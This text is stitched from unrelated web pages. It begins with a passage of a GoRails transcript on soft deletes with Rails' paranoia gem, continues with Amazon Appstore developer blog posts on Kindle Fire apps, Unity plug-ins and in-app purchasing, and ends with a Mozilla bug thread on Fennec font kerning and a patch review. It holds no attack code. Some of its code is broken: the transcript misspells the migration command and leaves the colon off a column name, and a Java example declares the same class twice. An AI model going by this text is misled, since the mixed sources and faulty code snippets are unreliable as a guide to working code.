with_deleted, only_deleted, and these will give you either all records, or only the deleted records, and by default the scope is modified so that you only get undeleted records. Now we need to take a little bit look at this and see what happens. Now we deleted id number 3, and we go and view that page, it's no longer available. This has actually changed our full scope here, so when we say ForumThread.find(3), it can't find it and we get this error, and the error is "ActiveRecord::RecordNotFound" one, so it couldn't find an id 3, but if you notice here, it's also adding the condition that the deleted_at column needs to be null. So imagine that you're having an admin account on the application, and you want to say ForumThread.with_deleted.find(3), and you'll actually get it back, so maybe admins use the with_deleted scope, and the rest of the users only see stuff that is not deleted, and maybe you have a section in your application that is archived threads and maybe those are the ones that are all listed there, so only the deleted ones are listed in your archive section. This is really nifty because it allows us to do a lot of stuff like this, and what if we want to restore that Forum Thread? ForumThread.restore(3), and this now updates the record's deleted_at to nil, so it comes back. Now we want to go and see how to delete users because that's what we started with, and forum threads is a little bit simpler because we're just accessing the records directly from the model. Now with this, though, we're going through the thread or the post, and we're trying to talk to the association, and we have to update and override our association to handle this, because we need to include with_deleted in this case. Let's go ahead and add our migration in here railg g migration AddDeletedAtToUsers deleted_at:timestamp db/migrate/add_deleted_at_to_users def change add_column :users, :deleted_at, :timestamp add_index :users, deleted_at end rake db:migrate Now our users will be able to be soft deleted, and we'll have to go to the user model and add in the acts_as_paranoid method in here, and once we've done that, now we can run our rails console and gran that last user User.last.destroy They've been deleted, and now when we visit this page, we get the same error that we started with, and that's a little annoying, because we know the record exists, and in this case, it's a public forum so if you delete your account, that's fine, but we can still keep your post up or show your name, we'll just go with that, because the content is public anyways. In some cases, you may want to truly delete it, an replace these with placeholders, or just not show this post for example, but in our case we want to display the content even if it's deleted or not, and the way that we need to do that is to open up the app/models/forum_post.rb, and we need to override the getter that the belongs_to user sets for us. If you understand how belongs_to works, you have a def user =(), and it takes some arguments, and then you have a def user that doesn't take any arguments, and this is what returns the User.find on the user id, so this User find getter is basically just calling that using the user_id column. So it's as simple as that, it looks at the symbol, adds "_id", and then bascially generates a method behind the scenes that does that user = is very similar, it passes those your options over to User.create, it saves the user id into a variable, and the updates the forum posts with that id and so on. You can create the user methods like that, but you can also override them. So belongs_to, you could create by hand if you wanted, but we have this helpful association shortcut, but it doesn't allow us to find users that are deleted, so we can say def user User.with_deleted.find(user_id) end instead, and this should allow us to refresh the page and now it shows "Test User" there still, so that's cool. This is one way of doing it, the example in their documentation in the paranoia gem is to use User.unscoped { super }, which I think is a better solution def user User.unscoped { super } end Super calls the original method that we're overriding, and that original method would be from the belongs_to If we come back and refresh this page, it works as we expected, and I would recommend using their example to do this, because the unscoped basically removes the deleted_at = null condition, and then it calls with the original query. Now the way you implement this is going to be very application-specific, if you're doing things like Stripe would with payments, you probably want to keep those records around, on the other hand, if you're doing something like a forum, you may want to actually delete the user's account permanently. Paranoia is a perfect gem to straddle that balance, you can use it at will on any models that you want, and you have all of these helper methods and other things like this, really_destroy! to actually delete the record. It provides all of those things that you could want from a soft delete library, and I'm really really happy with it, they've done a great job on it, so I hope this helps and you're able to add soft deletes into your applications as well. Transcript written by Miguel Join 27,623+ developers who get early access to new screencasts, articles, guides, updates, and more.
https://gorails.com/episodes/soft-delete-with-paranoia
CC-MAIN-2020-05
refinedweb
2,240
64.78
Up to [DragonFly] / src / sys / dev / video / meteor Request diff between arbitrary revisions Keyword substitution: kv Default branch: MAIN Fix numerous spelling mistakes. functions to avoid conflicts with libc. Remove all occurences of double semicolons at the end of a line by single ones. Submitted-by: Bill Marquette <bill.marquette@gmail. Comment out extra token at end of #endif.. Fix format string lets go ahead and commit this before we hit the network interfaces __P removal Add or correct range checking of signal numbers in system calls and ioctls.. Add the DragonFly cvs id and perform general cleanups on cvs/rcs/sccs ids. Most ids have been removed from !lint sections and moved into comment sections. import from FreeBSD RELENG_4 1.49
http://www.dragonflybsd.org/cvsweb/src/sys/dev/video/meteor/meteor.c?f=h
CC-MAIN-2015-18
refinedweb
122
59.7
No results found November 19, 2012Amazon Mobile App Distribution Program Integrating Amazon’s In-App Purchasing and Amazon GameCircle APIs into mobile games is easy, but we’re always working to make it even quicker and easier. Today, we're pleased to announce the release of new plug-ins for the In-App Purchasing and GameCircle APIs for the Unity game engine. If you build your games with Unity, you can now use these plug-ins to rapidly add both In-App Purchasing for virtual goods and GameCircle for leaderboards, achievements, and Whispersync for Games. Unity Technologies' game engine is one of the most popular tools for creating games. It enables you to easily create rich, interactive 3D experiences by providing ways to assemble your art and assets into scenes and environments, add physics, and simultaneously play-test and edit games. When you’re finished building and testing, the Unity engine creates a binary targeted for your chosen platform –like an Android APK which you can publish to Kindle Fire and the Amazon Appstore for Android. The new plug-ins for Unity are available today for free as part of the AmazonMobile App SDK. You can download the latest version here. Just follow the simple instructions in the documents to get started. Of course, you’ll also need the Unity game engine in order to use the plug-ins. If you haven’t tried it yet, you can download a free version of Unity here. Sign in to your Amazon Mobile App Distribution Portal account now to get started. November 18, 2012Amazon Mobile App Distribution Program CJ Frost, Technical Evangelist for Amazon Kindle, is our guest blogger for this post. Kindle Fire tablets are designed to be rich content consumption devices. To make sure your app supports this goal and provides the best user experience, keep in mind that you are building for a tablet, not a smartphone. Many apps are derived from existing Android smartphone apps and do not scale well to the tablet form factor. Scaled apps generally do not look as good as dedicated tablet apps and are feature-limited when compared to a similar app designed specifically for a tablet environment. These scaled apps can also suffer from significant degradation in graphics quality as the UI and elements are dynamically scaled up, by the Android platform, to fit the screen. Optimizing your app for tablets offers numerous benefits. It enables you to offer a rich,easy-to-navigate, and more detailed user experience, allows you to optimize user engagement, and can potentially improve your monetization opportunities. To help you create the best user experience for both small and larger screened devices, we've put together a list of our top phone-to-tablet app development tips. Exploit the real estate. Apps that are scaled up from a smaller screen size generally do not look as good as dedicated tablet apps and are feature-limited when compared to a similar app designed specifically for a tablet environment. For example, many mobile phone apps are designed as lists of items (e.g., postings, photos) that link to new pages. When viewed on a Kindle Fire tablet, these apps appear feature-limited compared to a similar app designed specifically for a tablet environment. The lists do not fill the screen, nor do they take advantage of the potential user experience features.Apps designed to be multi-pane leverage the screen real estate so users can directly open content they'd otherwise page to on a phone app. For more information on how to design your app for larger screens, see the Android documentation on devicesand displays,planningfor multiple touchscreen sizes, and movingfrom multi-page to multi-pane designs. Optimize for dynamic resizing. Apps designed for phones tend to be created as portrait apps only. Apps designed for tablets are optimized to be viewed in portrait or landscape mode by providing orientation-specific layouts, as demonstrated in the Simple RSS Reader Sample,and re-size dynamically using the accelerometer to sense orientation. Apps designed primarily for use on phones can also suffer from significant degradation in graphics quality as the UI and elements are dynamically scaled up, by the Android platform, to fit the screens of larger devices. For more information on how to design your app for dynamic resizing, see the Android documentation on supportingdifferent screen sizes. Design for interactivity. Apps designed for phones are intended to be used with one hand and provide single-point touch elements with larger touch targets to accommodate thumb navigation. In contrast, apps designed for tablets are developed using multi-point touch elements that can accommodate tablet users'normal two-handed pinch-zoom and swipe actions, providing a richer and more dynamic user experience. For more information on how to design your app for interactivity, see the Android documentation on making interactive views. Increase your reach. Apps designed for phones tend to provide a static representation of non-interactive content. Apps designed for tablets offer additional opportunities for interactivity and can help you extend the reach of your business by including partner content, such as ads or additional game offerings, as well as interactive applets, in a multi-pane design. November 14, 2012Amazon Mobile App Distribution Program Starting today, the Kindle Fire HD 8.9” will begin shipping to customers. Kindle Fire HD 8.9” offers a 1920x2000 HD resolution display,with Dolby audio and dual stereo speakers. There’s also Kindle Fire HD 8.9” 4G,which offers ultra-fast 4G LTE wireless from AT&T. This rounds out our new selection of Kindle Fire tablets, including the all-new Kindle Fire and the Kindle Fire HD, which has already become the best-selling item on Amazon worldwide. Make sure your apps are ready. We’ve provided tools to optimize your app for Kindle Fire tablets, including the Kindle Fire HD 8.9”: For a full list of resources available, read our blog post from the Kindle Fire tablet announcement here. November 13, 2012Amazon Mobile App Distribution Program Jon. November 11, 2012Amazon Mobile App Distribution Program Jeremy Cath, Technical Evangelist for Amazon Kindle, is our guest blogger for this post. How quickly your app starts is a significant factor in creating a good impression for your customers, especially if they use your app frequently. To help your app start quickly, consider the following best practices. Show a minimal experience as fast as possible--some of the user perception of performance comes from how fast an app displays something after the user launches the app, so showing a minimal splash screen as soon as possible while the rest of the initial experience is loading makes startup appear more responsive. The Android activity life cycle looks like this: So one of the most effective ways to optimize startup time is to minimize tasks that take place in onCreate() and onStart(). If your full activity takes some time to display, starting with a minimum experience and transitioning to the main part of your application gives the user the impression of a responsive app. One solution is described below. For a fuller version, download the Kindle Fire sample code and see the SampleSplashScreen sample. <activity android:name=".Min" android:label="@string/title_activity_min" android: <intent-filter> <action android: <category android: </intent-filter> </activity> <activity android:name=".Full" android: </activity> Notethe use of the theme: "MinBackground." This should be defined intheme.xml. <style name="Theme.MinBackground" parent="android:Theme"> <item name="android:windowBackground">@color/gray</item> <item name="android:windowNoTitle">true</item> </style> Andthe color "gray" can be defined in color.xml. <color name="gray">#444444</color> "Min" should be as simple as possible, for example (min_layout.xml): <RelativeLayout xmlns:android="" xmlns:tools="" android:layout_width="match_parent" android: </RelativeLayout> You could add a logo or text to this screen, but the overall goal is to make it lightweight and fast. The launcher will invoke Min when starting the app. Inside Min you can then invoke Full(in a thread), which will display once loaded by doing this: public class Min extendsActivity { public class Min extendsActivity { @Override publicvoid onCreate(BundlesavedInstanceState) { super.onCreate(savedInstanceState); // Hide the soft keys and status bar I getWindow().setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN, WindowManager.LayoutParams.FLAG_FULLSCREEN); // Display this activity. setContentView(R.layout.min_layout); // Create a thread to do the heavy lifting and then // start the Full Activity finalThread workerThread =new Thread(){ @Override public void run() { // Call a method to perform thework. Min.this.loadResources(); // Start the full Activity. Min.this.startActivity(newIntent(Min.this, Full.class)); // Avoid the flash back to home screen. Min.this.overridePendingTransition(0, 0); // Never come back to this Activity. Min.this.finish(); } }; workerThread.start(); } } To tune startup "under the covers," consider the following tips: // BAD! staticCacheManager sCacheManager = newCacheManager(); // better staticCacheManager sCacheManager = null; publicstatic CacheManager getCacheManager() { if(sCacheManager== null) {sCacheManager = new CacheManager(); } returnsCacheManager; } If your app relies on network-loaded resources, use a persistent cache to avoid a network call during startup. This also applies within the app in general—avoid relying on a network connection if the assets can be retained locally; this will improve performance while reducing the user's bandwidth consumption. On the Android platform, static methods have been demonstrated to perform up to 20% faster than virtual methods (see here for more information). To help you identify areas that need work in your app, there are a couple of handy tools that you should become familiar with: StrictMode will help you identify bad practices in the UI thread, such as accessing the networkor disk. For information on how to use StrictMode, see the StrictModedocumentation. Traceview can be used to profile what is happening in your app. For information on how to use Traceview,see the Traceview documentation. As an example of how to use Traceview to measure startup time programmatically, you can follow these steps: Traceview introduces overhead on its own, and as such is not terribly useful for making absolute statements about time (e.g., that XYZ takes 10ms). It is useful for finding hotspots, and (mostly) comparing relative runtimes of sections of code. Also, it’s worth noting that overhead is only introduced on the java side. Native methods run as quickly as they normally do—so native calls end up appearing to take a smaller percentage of runtime than they actually take. November 07, 2012Amazon Mobile App Distribution Program With. Image support has also been improved. In addition to all the expected browser image formats, we now support SVG via both the HTML5<svg> tag and .svg resources in <img> tags.. November 04, 2012Amazon Mobile App Distribution Program Amazon customers are familiar with our personalized product recommendations—they’re front and center for customers on Amazon.com, as well as the Amazon Appstore for Android’s web store. Amazon’s recommendation engine ensures that each customer is receiving suggestions of other products based on their past purchases, making shopping convenient and allowing them to discover new products that they may be interested in. The same recommendation technology is now included on the Kindle Fire HD and all-new Kindle Fire. Customers will see recommendations of other apps that they may enjoy right on the carousel of the Kindle Fire HD and all-new Kindle Fire. In the example below, you can see that customers who are downloading USA TODAYalso are commonly downloading TuneIn Radio Pro, Scrabble and CalenGoo. From within the “Apps” category, customers are presented with another way to discover new apps. There’s the “Recommended for You” section, featuring apps personalized to the customer’s past downloads, and “New for You”, specifically featuring only new apps that they may be interested in. Recommended apps are also featured on every app’s product page on the web, Kindle Fire tablets and in our smartphone app. Apps are featured in the “Customers Who Bought This App Also Bought” section based on similarities between customers downloading your apps and other apps on Amazon. For example, customers who downloaded Scope also are consistently downloading Minecraft – Pocket Edition, Temple Run: Brave and textPlus GOLD. This extends outside of just the Amazon Appstore too – if customers are buying any product on Amazon and also buying your app, the recommendation will show there, and vice versa. This means you may see toys or books within this area on your app, or your app may be featured similarly on a product in the Home or Video Games stores. Improving app discovery is just another way that Amazon helps you grow your business. As a developer, all you need to do is submit your apps in the Mobile App Distribution Portal. We will take care of making sure your apps are presented in front of the right customers. October 31, 2012Amazon Mobile App Distribution Program You might have already heard about the 6th AWS Global Start-Up Challenge, which is now accepting entries for this year’s contest. This contest, launched in 2007, is away for promising start-ups to get noticed and compete for an opportunity to win some great rewards. This year, Amazon Web Services will select four grand prize winners – one from each of the following categories: Each grand prize winner will be awarded $50,000 in cash, $50,000 in AWS credits, as well as AWS Business Support services for one year and technical mentorship from AWS. The final judging event for the Challenge representatives from VC firms such as Sequoia, First Round Capital and Madrona. After the final judging round, we will be hosting a finale event at Dog Patch Wine Works in San Francisco, CA where we will announce the 4 Grand Prize Winners. Here, the 12 finalists will get to present to a large audience of start-ups, entrepreneurs and like-minded business professionals. This event is open to everyone to attend and registration will be announced shortly. Don’t miss your change to win big. Learn more about this year’s Challenge and enter by visiting . The deadline to enter is 11:59:59P.M. (PT) on Wednesday December 5, 2012. If you have more questions about the contest or your entry application, please refer to the Official Rules, Frequently Asked Questions page, or email awsstartups@amazon.com. Interested? Get started here. In addition to sessions on developing for Kindle Fire tablets, there are also great sessions at AWS re: Invent specifically for start-ups. Whether your start-up is running on AWS today or if you’re prototyping your mobile app, AWS re:Invent is the place to learn how to build and scale your business on the AWS Cloud. October 30, 2012Amazon Mobile App Distribution Program Mudeem Siddiqui, Solutions Architect, a2z Development Center Inc., an Amazon.com company, is our guest blogger for this post. initiatePurchaseUpdatesRequestis an important API call that enables developers to restore in-app purchases. A common use case for this method is when a customer buys in-app items on one device and then downloads the same app on another device, or when a customer re-installs the app after removing it from their device. In both scenarios, through the initiatePurchaseUpdatesRequest() call, make past in-app purchases and restore those purchases to the correct state. Consider a scenario where a freemium app uses the In-App Purchasing API to grant an entitlement to the full version of the app. A customer downloads the free version and unlocks the full version through an in-app purchase. Then, they remove the app from their device. The customer then re-installs the app from the cloud. If the initiatePurchaseUpdatesRequestcall is used correctly, the customer will have a seamless experience and have access to full version of the app without taking any action. This is a great customer experience. On the contrary, if the call is not used or used incorrectly, the customer will not have access to content they’ve already purchased. Instead, the customer will be presented with the free version and the option to purchase the full version. This is a bad customer experience and could lead to negative reviews. Make the PurchaseUpdates call whenever the onResume() activity lifecycle method is invoked and determine if the customer has already purchased any entitlements and subscriptions. Based on the result, lock/unlock content in the app as appropriate. Here are the technical details of how to use PurchaseUpdatesAPI calls: 1. Override and implement onPurchaseUpdateResponse callback: In the Observer class that extends BasePurchasingObserver, override and implement callback onPurchaseUpdatesResponse. This callback will be called on initiation of purchase updated request. private class MyObserver extends BasePurchasingObserver{ ... // // Is invoked once the call from initiatePurchaseUpdatesRequest is completed. // On a successful response, a response object is passed which contains the request id, request // status, a set of previously purchased receipts, a set of revoked skus,and the next offset if // applicable. If a user downloads your application to another device,this call is used to sync // up this device with all the user's purchases. // // @param purchaseUpdatesResponse // Response object containing the user's recent purchases. // @Override public void onPurchaseUpdatesResponse (PurchaseUpdatesResponsepurchaseUpdatesResponse){ for (final String sku : purchaseUpdatesResponse.getRevokedSkus()){ // Revoke Items here } switch(purchaseUpdatesResponse.getPurchaseUpdatesRequestStatus()) { case SUCCESSFUL: for (final Receipt receipt: purchaseUpdatesResponse.getReceipts()) { switch (receipt.getItemType()) { case ENTITLED: // If the receipt is for an entitlement,the customer is re-entitled. // Add re-entitlement code here break; case SUBSCRIPTION: // Purchase Updates forsubscriptions can be done here in one of two ways: // 1. Use the receipts to determineif the user currently has an active subscription // 2. Use the receipts to create asubscription history for your customer. break; } } case FAILED: // Failure Case } } ... } NOTE: Please be aware that this method is invoked on the UI thread. Any long-running tasks should run on another thread. It is best practice to use AyncTask to implement onPurchaseUpdatesResponse functionality. Please see ButtonClicker example for details. 2. Initiate the purchase update request: initiatePurchaseUpdatesRequest initiates a request to retrieve updates about items that customer has purchased. A good place to call this function is from onGetUserIdResponse()callback where initiateUserIdResponse() should be called from OnResume() in the MainActivity to check which customer has signed in. Chaining these calls ensures that you can correlate the user to the purchased content. private class MyObserver extends BasePurchasingObserver{ ... ... // When the application resumes the application checks which customer is signed in. @Override protected void onResume() { super.onResume(); PurchasingManager.initiateGetUserIdRequest(); }; ... ... } private class MyObserver extends BasePurchasingObserver{ ... ... @Override publicvoid onGetUserIdResponse(final GetUserIdResponsegetUserIdResponse) { ... ... PurchasingManager.initiatePurchaseUpdatesRequest(...) ... ... } } The argument to initiate PurchaseUpdateRequest is an offset. The offset represents a position in a set of paginated results. Operations that make use of an offset as input will provide an offset as an output. You can use the offset to get the next set of results. To reset an offset, you can pass in Offset.BEGINNING. It is a best practice to continue the current offset of the call within your app and use that offset for subsequent calls. It is best practice to associate an offset with a UserID in the event multiple customers share the same physical device. Offset values are base64 encoded values and not human readable. NOTE: It's a best practice to have the onGetUserIdResponse implementation in an AsycTask. In that case, initiatePurchaseUpdatesRequest() should be called from onPostExecute() function of the AsycTask. For a comprehensive example see ButtonClicker sample part of In-App Purchasing API. October 29, 2012Amazon Mobile App Distribution Program Kate Shoaf, Marketing and Public Relations leader at PlayTales, is our guest blogger for this post. PlayTales is a world leader in children’s bookstore apps, that has expanded internationally, with offices in the USA, UK, Spain, Romania, and China. Founded in 2010, PlayTales develops and distributes interactive playable storybooks for children within the world’s leading children’s bookstore app for smartphones and tablets. International distribution has become a prominent part of PlayTales’ business plan as we’ve realized the international market can open the door to millions of downloads for our apps. Although we developed the app with the intention of mainly distributing in the USA, China and the UK have become some of our top downloaders. We´ve developed and localized our app to cater to the needs of our various international customers. Based on our experiences, there are several things developers should consider as they prepare and launch their applications: A unique feature of our app is the several language options users can choose. The selected language of the application is based on the settings of the user’s device, but within the application itself, you can choose to view the stories in a different language. For example, all of your menus and links are in English, but you can easily view all stories in their Spanish version, French version, Italian version, and so on. We know our target users are interested in exposing their children to various languages so we’ve developed our app to make this possibility easily attainable. If you look at this screen shot, you’ll notice that all menu items are in English, while the books are available in Spanish; a unique feature that caters to our target user. Anyone can learn a new language, but when it comes to common phrases and appropriate expressions we’ve found that working with native speakers is the best method for localization. At PlayTales we translate our stories into eight different languages and there is no substitute for working with a native speaker. When translators become a part of your localization team, they understand the message and product quality you are trying to develop within your app. With the current economic crises going on it seems that currencies all over the world are constantly on a roller coaster of changing value. Because our books are available in so many different countries, monitoring exchange rates has become an important pastime within the office. We deal with Dollars, Euros, Yuan, and Pounds and the constantly changing exchange rates have kept us on our toes. It is important to monitor the currencies you deal with because you can lose business if your prices are too high, and also miss opportunities to generate more revenue if your prices are too low. Monitor your money and don’t lose out on business because of this common mistake. It’s almost impossible to release an app that is absolutely perfect. Listening to the comments of users can really help work out the kinks and improve your app. Within all PlayTales accounts, users have the option to directly contact our tech/localization team in whatever language they want. Because our translators work in-office, we are able to efficiently respond to everyone that contacts us in their native language. If you are going to have a multiple language app, make sure that your users can communicate with your tech team in their preferred language. Adapt your app so that it can be accessed by potentially everyone. PlayTales started out as an app only accessible through iOS devices. But as tablets like the Kindle Fire were released, it became obvious that adapting our apps to function on these devices was necessary. After teaming up with Amazon, we’ve seen a great increase in our number of downloads. Amazon’s submission module makes submitting localized features such as texts, graphics, and user interfaces a simple and quick process. Using Amazon as a distribution platform has made our app easily attainable for tablet users and has given us a chance to enter a market we hadn’t considered before. Remember that iTunes is not your only resource; you can develop and adapt your apps to function on almost any device and consequently tap into new markets. Distributing internationally is becoming a necessity for many developers who want to stay on top of the market. Know your target users and develop your app accordingly, remember to use native speakers to help with localization, monitor exchange rates, offer tech support in various languages, and adapt your app to a changing market. Following this advice may help you find the international success we’ve experienced. New technologies are spreading to every part of the world, and along with it the newest applications. Take advantage of this opportunity and go global. October 24, 2012Amazon Mobile App Distribution Program Amazon’s mobile app distribution platform continues to expand internationally, giving developers a chance to grow their businesses. We are pleased to let you know that the Kindle Fire and Kindle Fire HD will be coming soon to Japan. Check out the press release here. Additionally, we started shipping Kindle Fire and Kindle Fire HD tablets to the U.K., France, Germany, Italy and Spain this week. Visit Kindle Fire Developer Resources to build for the Kindle Fire and Kindle Fire HD. And you can learn more about taking your app international with Android localization tips and resources and steps for localizing your app in the Distribution Portal right here on the blog. Sign in to your Amazon Mobile App Distribution Portal account now to get started. We’ve released a beta of the Kindle Fire HD 8.9" emulator to enable you to test and debug your apps in anticipation of the device launch next month. While we recommend developers test their apps on a physical device whenever possible, you can test many aspects of your apps without running your code on a device. This allows you to be confident that the user interface, navigation and flow through the application are as you designed it. The emulator for the Kindle Fire HD 8.9" is currently available as a beta. Be aware that the user interface and functionality of the beta emulator may not match the experience available in the Kindle Fire HD 8.9"when it is released later this year. With high resolution device emulators such as the Kindle Fire HD 8.9”, we recommend enabling GPU emulation. This will deliver a smoother graphical experience and faster start-up experience. While this will help performance throughout the emulator for host computers that support these capabilities, it will have the most impact in graphics-intensive OpenGL- based applications such as games. Learn more by following the instructions at this link. We’ve also updated the emulators for the all-new Kindle Fire and the Kindle Fire HD7” to reflect the software in the latest over-the-air software update. Ready to get started? Review the documentation, install the emulators, and give them a whirl. We’d love to hear your feedback in the forums. Kindle FreeTime is available in the latest over-the-air software update that was released today for the Kindle Fire HD and all-new Kindle Fire. This new feature provides a dedicated space for kids to interact with books, movies, TV shows, apps, and games. With Kindle FreeTime, parents never have to worry about the content their kids will access–parents select the content their kids will see , and kids can’t exit FreeTime without a password. Kindle FreeTime also offers parents enhanced tools to manage their child’s content and interaction, including multiple profile support and daily time limits. Parents can create a profile for each of their children and choose which books, movie, TV shows, apps, and games they want to give each child access to. As a developer, you don’t need to do anything to participate in Kindle FreeTime other than build great products. Simply by including them in the Amazon Mobile App Distribution Program, your apps will be available for parents to include in their children’s personalized experience. Join the Amazon team, along with mobile app and game developers like you, at AWS re: Invent for two days of sessions covering everything you need to know to grow your business and monetize on Kindle Fire. Amazon’s first developer conference is the perfect opportunity for you to learn strategies and tips to help you thrive, from creating engaging user experiences on Kindle Fire to building mobile apps that scale for rapid user adoption. You'll also be able to learn more about Amazon GameCircle, which makes it easy for you to create more engaging gaming experiences via achievements, leaderboards and sync APIs. Stop by our booth and play with Kindle Fire—we’ll have the Kindle Fire HD available for you to play with loaded with mobile apps and games that have already been optimized for the tablets. Plus, Amazon Mobile App Distribution marketing and technical representatives will be there, ready to answer your questions on optimizing for and being marketed on Kindle Fire. Here are just some of the sessions offered for mobile app and game developers: Distributing Apps Through Kindle Fire and the Amazon Appstore for Android. Creating the Killer App for Kindle Fire Mike Nash, vice president of Kindle Developer Programs, will be providing tips and optimizations you can easily implement to make the killer app on Kindle Fire and stand out from the crowd. Monetizing Your App on Kindle Fire: In-App Purchasing Made Easy. Level Up Your Kindle Games with Amazon GameCircle Jason Chein, director of Game Services, will be presenting the brand new games library experience, fully integrated with Amazon GameCircle, and offering tips on how to increase customer engagement of your content. This session is open for all but specifically tailored for game designers,producers, and publishers. In addition to the sessions and the expo, we will also be hosting other events: AWS re: Invent will be held Tuesday-Thursday, Nov. 27-29,2012, at the Venetian in Las Vegas. For more information about AWS re: Invent and to read about the 150+ sessions and other conference activities, go to the AWSre: Invent website. We hope to see you there. Amazon recently expanded electronic payments to include additional countries. Now more developers in the E.U. can select an electronic payment method as a more convenient way to receive payment. Using electronic payment gives you the benefit of having your mobile app distribution payment sent directly to your bank, reducing the time it takes you to get paid. Plus electronic deposits paid in your home currency may help you avoid conversion fees that could be imposed by your bank. Sign in to your Amazon Mobile App Distribution Portal account now to make sure your next payment is electronic. Simply select your bank’s location from the “Where is your bank/financial institution?” drop-down menu. If available, you will have the option to choose an electronic payment (this could be “wire transfer” or “electronic funds transfer”, depending on your location). Once selected you will need to enter your bank information. The following thresholds must be met before Amazon issues a payment: See our previous post for some additional information here.
https://developer.amazon.com/blogs/appstore/author/amazon+mobile+app+distribution+program?page=2
CC-MAIN-2022-33
refinedweb
5,102
53.21
Load any page into fennec that uses standard variable width fonts and note the kerning (space between the letters). You'll see that letters are oddly spaced. For example, on bugzilla.mozilla.org, you can note that the a's have too much space after them and the t's have too little (check out t's at the ends of words). You can see the same effect on cnn.com. If you zoom in, the kerning is repaired and looks normal. But at the default zoom level, this makes pages hard to read. 1. Go to site (bugzilla.mozilla.org, cnn.com, etc) == Actual == Kerning is messed up. == Expected == Kerning is displayed properly. Note that if you zoom in, the kerning is displayed properly, but returning to the default zoom level, the incorrect spacing returns. I'll try to get some screen shots. Marking blocking ? because if you can't easily read sites, fennec isn't useful. Doh: version: Mozilla/5.0 (X11; U; Linux armv6l; en-US;rv:1.9.2a1pre) Gecko/20081219 Fennec/1.0a2pre sorry for spam Can someone verify this behavior on the latest nightly? I tried bugzilla and theglobeandmail with no luck. Has it been fixed? Since we set zoom level to <1 on websites that have overflows at 800px width (like theglobeandmail and some urls on bugzilla), I wonder if this only occurs at zoom levels less than 1. I think it's still an issue. Here's what a globeandmail.com page looks like, zoomed in, with today's nightly: You can also see it when zooming into article snippets on Just noticed this isn't a problem on Mac! Jeff asked, and I'll answer here: I marked this blocking1.9.2+ because it was marked blocking-fennec:1.0+ It may have been fixed a while back; just don't want to lose track. Is this something specific to fennec builds or happens also on Linux? Windows? Not sure the platform == all makes sense. It would really help to have a testcase and some screenshots to investigate. I'd like more detail on what the approach is to fix this. In the platform meeting [1] we discussed that a possible solution would be forking the file that controls this code. I really really discourage that approach because once you fork that file, we'll lose the ability to test this change as part of the automated regression testing for the general 1.9.2 platform. The fennec tests are not up to snuff to catch any regression issues that might occur as a result of the change. What are the options we're considering here? Is there a WIP patch we can take a look at? [1]: (In reply to comment #11) Clint, please set up a testcase with a page that uses a defined set of fonts that don't display correctly in a given environment. Please note whether zooming is required or not to produce the problem. If the problem is on fennec, does the same problem also occur under in a Linux environment? A couple example test pages using downloadable fonts, these can easily be reworked to use platform fonts: Kerning is usually a post-process of adjusting the advance widths based on the surrounding characters but the screen shot in comment 6 looks really off, I don't think this is just a problem with handling kerning data, something else is off, even if the end result looks like a kerning problem. Any ETA here? This is at this point one of three remaining non-JS core blockers.... and has had no activity at all for a week. Stuart's under the weather, but is working on the bug. I hate to do it, but I'd like to revisit the blocking decision on it. Specifically, from looking at the problem with Madhava, I wonder if the gain from fixing kerning will be enough, or if the font appearance problem runs deeper than just kerning. There appeared to be differences in subpixel rendering when compared side by side with another device like the iPhone I was asked for another example of the problem, so here: some particularly problematic areas called out with flickr notes That honestly doesn't look bad to me -- especially since that's zoomed in. Why would you ever zoom in that much to read text? BTW, is the title of this bug inaccurate? Should it be "kerning incorrect when zoomed in" or is it referring to 100% zoom? Here is CNN on the Maemo: Default page load: Double tap on a paragraph so I can read it: (In reply to comment #17) > BTW, is the title of this bug inaccurate? Should it be "kerning incorrect when > zoomed in" or is it referring to 100% zoom? Kerning us observed when zoomed out as well, as Mark points out. By default we zoom to fit the page on the screen. The CNN shots are certainly more illustrative, and zoomed out it affects small text readability :/ Are we sure kerning alone will fix this? this bug has nothing really to do with kerning The screenshots in comment 18 are both taken with hinting enabled. How do things look with hinting off? (This will need to be done for subpixel positioning anyway I assume, so would at least be a cheap partial solution?) At what size is the text reflowed? Stuart doesn't consider this a blocker, and I tend to agree, because we can ifdef this out on non-mobile platforms. this is a 1.9.2 blocker, not a firefox 3.6 one. Stuart's right, though if this becomes the last blocker for Firefox desktop, then we'll declare 1.9.2 complete and Stuart will put this in a 1.9.2.1 on which Firefox for Maemo will be based. Ah, the fun of branch mechanics! Created attachment 419506 [details] [diff] [review] disable hinting for mobile Comment on attachment 419506 [details] [diff] [review] disable hinting for mobile In PrepareSortPattern(): >@@ -1746,6 +1746,14 @@ > } > #endif > >+#ifdef MOZ_GFX_OPTIMIZE_MOBILE >+ cairo_font_options_t *options = cairo_font_options_create(); >+ cairo_font_options_set_hint_style (options, CAIRO_HINT_STYLE_NONE); // not sure if this takes effect here or not >+ cairo_font_options_set_hint_metrics (options, CAIRO_HINT_METRICS_OFF); // this doesn't take effect here Yes, this does nothing here. Don't bother with this line. >+ cairo_ft_font_options_substitute(options, aPattern); Docs for cairo_ft_font_options_substitute say "Options that are already in the pattern, are not overridden". In fact, in some options will get overridden sometimes but that is a bug. Really you want this before ApplyGdkScreenFontOptions(). Fortunately, CAIRO_HINT_STYLE_NONE will not be affected (overridden) by the bug. What might be most clear, though, is to only change ApplyGdkScreenFontOptions() (instead of PrepareSortPattern()) to add cairo_font_options_copy() and cairo_font_options_set_hint_style (options, CAIRO_HINT_STYLE_NONE) after gdk_screen_get_font_options() (with a later destroy). In CreateScaledFont(): >@@ -2520,7 +2528,11 @@ > // font will be used, but currently we don't have different gfxFonts for > // different surface font_options, so we'll create a font suitable for the > // Screen. Image and xlib surfaces default to CAIRO_HINT_METRICS_ON. >+#ifdef MOZ_GFX_OPTIMIZE_MOBILE >+ cairo_font_options_set_hint_metrics (fontOptions, CAIRO_HINT_METRICS_OFF); >+#else > cairo_font_options_set_hint_metrics(fontOptions, CAIRO_HINT_METRICS_ON); >+#endif Looks good. >+#ifndef MOZ_GFX_OPTIMIZE_MOBILE > FcBool hinting; > if (FcPatternGetBool(aPattern, FC_HINTING, 0, &hinting) != FcResultMatch) { > hinting = FcTrue; >@@ -2578,6 +2591,9 @@ > #endif > } > cairo_font_options_set_hint_style(fontOptions, hint_style); >+#else >+ cairo_font_options_set_hint_style(fontOptions, CAIRO_HINT_STYLE_NONE); >+#endif This shouldn't usually be necessary as this is already set in PrepareSortPattern()/ApplyGdkScreenFontOptions(). It will override user fontconfig settings if users want to force something different (after PrepareSortPattern has set the property). I'll let you choose whether you want to keep this 